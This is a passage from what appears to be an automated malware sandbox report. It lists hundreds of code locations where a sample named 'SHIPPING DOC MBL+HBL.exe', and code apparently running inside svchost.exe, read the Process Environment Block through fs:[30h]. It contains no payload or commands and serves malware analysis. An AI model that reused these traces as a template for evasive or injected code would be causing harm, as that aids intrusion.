            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00FEACE8 mov eax, dword ptr fs:[00000030h]0_2_00FEACE8
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00FEAC88 mov eax, dword ptr fs:[00000030h]0_2_00FEAC88
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03308324 mov eax, dword ptr fs:[00000030h]1_2_03308324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03308324 mov ecx, dword ptr fs:[00000030h]1_2_03308324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03308324 mov eax, dword ptr fs:[00000030h]1_2_03308324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03308324 mov eax, dword ptr fs:[00000030h]1_2_03308324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C310 mov ecx, dword ptr fs:[00000030h]1_2_0322C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250310 mov ecx, dword ptr fs:[00000030h]1_2_03250310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D437C mov eax, dword ptr fs:[00000030h]1_2_032D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov ecx, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA352 mov eax, dword ptr fs:[00000030h]1_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D8350 mov ecx, dword ptr fs:[00000030h]1_2_032D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330634F mov eax, dword ptr fs:[00000030h]1_2_0330634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]1_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]1_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032663FF mov eax, dword ptr fs:[00000030h]1_2_032663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC3CD mov eax, dword ptr fs:[00000030h]1_2_032EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B63C0 mov eax, dword ptr fs:[00000030h]1_2_032B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov ecx, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]1_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]1_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322823B mov eax, dword ptr fs:[00000030h]1_2_0322823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322826B mov eax, dword ptr fs:[00000030h]1_2_0322826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B8243 mov eax, dword ptr fs:[00000030h]1_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B8243 mov ecx, dword ptr fs:[00000030h]1_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330625D mov eax, dword ptr fs:[00000030h]1_2_0330625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A250 mov eax, dword ptr fs:[00000030h]1_2_0322A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236259 mov eax, dword ptr fs:[00000030h]1_2_03236259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]1_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]1_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]1_2_032402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]1_2_032402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov ecx, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]1_2_0326E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]1_2_0326E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033062D6 mov eax, dword ptr fs:[00000030h]1_2_033062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260124 mov eax, dword ptr fs:[00000030h]1_2_03260124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov ecx, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F0115 mov eax, dword ptr fs:[00000030h]1_2_032F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304164 mov eax, dword ptr fs:[00000030h]1_2_03304164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304164 mov eax, dword ptr fs:[00000030h]1_2_03304164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov ecx, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C156 mov eax, dword ptr fs:[00000030h]1_2_0322C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C8158 mov eax, dword ptr fs:[00000030h]1_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]1_2_03236154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]1_2_03236154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03270185 mov eax, dword ptr fs:[00000030h]1_2_03270185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]1_2_032EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]1_2_032EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]1_2_032D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]1_2_032D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033061E5 mov eax, dword ptr fs:[00000030h]1_2_033061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032601F8 mov eax, dword ptr fs:[00000030h]1_2_032601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]1_2_032F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]1_2_032F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A020 mov eax, dword ptr fs:[00000030h]1_2_0322A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C020 mov eax, dword ptr fs:[00000030h]1_2_0322C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6030 mov eax, dword ptr fs:[00000030h]1_2_032C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4000 mov ecx, dword ptr fs:[00000030h]1_2_032B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325C073 mov eax, dword ptr fs:[00000030h]1_2_0325C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232050 mov eax, dword ptr fs:[00000030h]1_2_03232050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6050 mov eax, dword ptr fs:[00000030h]1_2_032B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032280A0 mov eax, dword ptr fs:[00000030h]1_2_032280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C80A8 mov eax, dword ptr fs:[00000030h]1_2_032C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F60B8 mov eax, dword ptr fs:[00000030h]1_2_032F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F60B8 mov ecx, dword ptr fs:[00000030h]1_2_032F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323208A mov eax, dword ptr fs:[00000030h]1_2_0323208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0322A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032380E9 mov eax, dword ptr fs:[00000030h]1_2_032380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B60E0 mov eax, dword ptr fs:[00000030h]1_2_032B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C0F0 mov eax, dword ptr fs:[00000030h]1_2_0322C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032720F0 mov ecx, dword ptr fs:[00000030h]1_2_032720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B20DE mov eax, dword ptr fs:[00000030h]1_2_032B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]1_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]1_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]1_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov ecx, dword ptr fs:[00000030h]1_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]1_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AC730 mov eax, dword ptr fs:[00000030h]1_2_032AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C700 mov eax, dword ptr fs:[00000030h]1_2_0326C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230710 mov eax, dword ptr fs:[00000030h]1_2_03230710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260710 mov eax, dword ptr fs:[00000030h]1_2_03260710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238770 mov eax, dword ptr fs:[00000030h]1_2_03238770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov esi, dword ptr fs:[00000030h]1_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]1_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]1_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230750 mov eax, dword ptr fs:[00000030h]1_2_03230750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE75D mov eax, dword ptr fs:[00000030h]1_2_032BE75D
